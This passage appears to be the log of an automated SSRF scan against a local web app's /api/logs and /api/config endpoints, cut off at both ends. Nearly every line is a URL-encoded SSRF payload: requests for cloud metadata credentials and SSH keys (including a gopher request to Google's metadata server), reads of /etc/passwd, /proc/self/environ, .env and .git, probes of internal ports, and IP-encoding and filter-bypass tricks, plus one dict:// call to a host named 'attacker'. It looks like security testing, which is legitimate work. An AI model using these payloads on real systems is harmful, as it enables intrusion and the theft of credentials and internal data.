`http://localhost:4200/api/logs?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/logs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/logs?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/logs?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/logs?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/logs?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/logs?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/logs?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/logs?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/logs?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/logs?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/logs?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/logs?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/logs?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/logs?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/logs?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/logs?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/logs?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/logs?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.0` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/logs?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/logs?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/logs?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/logs?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/logs?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/logs?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/logs?url=3232235521` +- Testing: `http://localhost:4200/api/logs?url=3232235777` +- Testing: `http://localhost:4200/api/logs?url=425.510.425.510` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/logs?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/logs?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/logs?url=instance-data` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A22` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A443` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A80` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/logs?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/logs?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/logs?url=loopback` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A22` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A80` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A443` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/logs?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/logs?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/logs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/logs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/logs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/logs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/logs?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/logs?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/logs?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/logs?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/logs?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/logs?url=127.1%3A80` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/logs?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/logs?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/logs?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/logs?url=2130706433%2F` +- Testing: `http://localhost:4200/api/logs?url=3232235521%2F` +- Testing: `http://localhost:4200/api/logs?url=3232235777%2F` +- Testing: `http://localhost:4200/api/logs?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/logs?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/logs?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/logs?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/logs?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/logs?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/logs?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/logs?url=0%2F` +- Testing: `http://localhost:4200/api/logs?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/logs?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/config +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/config?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/config?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/config?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/config?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/config?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/config?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/config?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/config?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/config?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/config?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/config?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/config?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/config?url=127.1%3A80` +- Testing: `http://localhost:4200/api/config?url=0` +- Testing: `http://localhost:4200/api/config?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/config?url=localhost%3A80` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/config?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/config?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/config?url=127.127.127.127` +- Testing: `http://localhost:4200/api/config?url=127.0.1.3` +- Testing: `http://localhost:4200/api/config?url=127.0.0.0` +- Testing: `http://localhost:4200/api/config?url=2130706433` +- Testing: `http://localhost:4200/api/config?url=017700000001` +- Testing: `http://localhost:4200/api/config?url=0x7f000001` +- Testing: `http://localhost:4200/api/config?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/config?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/config?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/config?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/config?url=google.com.localhost` +- Testing: `http://localhost:4200/api/config?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/config?url=localtest.me` +- Testing: `http://localhost:4200/api/config?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/config?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/config?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/config?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/config?url=2130706433%2F` +- Testing: `http://localhost:4200/api/config?url=3232235521%2F` +- Testing: `http://localhost:4200/api/config?url=3232235777%2F` +- Testing: `http://localhost:4200/api/config?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/config?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/config?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/config?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/config?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/config?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/config?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/config?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/config?url=0%2F` +- Testing: `http://localhost:4200/api/config?url=127.1` +- Testing: `http://localhost:4200/api/config?url=127.0.1` +- Testing: `http://localhost:4200/api/config?url=localtest.me` +- Testing: `http://localhost:4200/api/config?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/config?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/config?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/config?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/config?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/config?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/config?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/config?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/config?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/config?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/config?url=127.0.1.3` +- Testing: `http://localhost:4200/api/config?url=0` +- Testing: `http://localhost:4200/api/config?url=127.1` +- Testing: `http://localhost:4200/api/config?url=127.0.1` +- Testing: `http://localhost:4200/api/config?url=localhost` +- Testing: `http://localhost:4200/api/config?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/config?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/config?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/config?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/config?url=7F000001` +- Testing: `http://localhost:4200/api/config?url=2130706433` +- Testing: `http://localhost:4200/api/config?url=6425673729` +- Testing: `http://localhost:4200/api/config?url=127001` +- Testing: `http://localhost:4200/api/config?url=127_0._0_1` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/config?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/config?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/config?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/config?url=localtest.me` +- Testing: `http://localhost:4200/api/config?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/config?url=127.127.127.127` +- Testing: `http://localhost:4200/api/config?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/config?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/config?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/config?url=0x7f000001` +- Testing: `http://localhost:4200/api/config?url=017700000001` +- Testing: `http://localhost:4200/api/config?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/config?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/config?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/config?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/config?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/config?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/config?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/config?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/config?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/config?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/config?url=169.254.169.254` +- Testing: `http://localhost:4200/api/config?url=2852039166` +- Testing: `http://localhost:4200/api/config?url=7147006462` +- Testing: `http://localhost:4200/api/config?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/config?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/config?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/config?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/config?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: 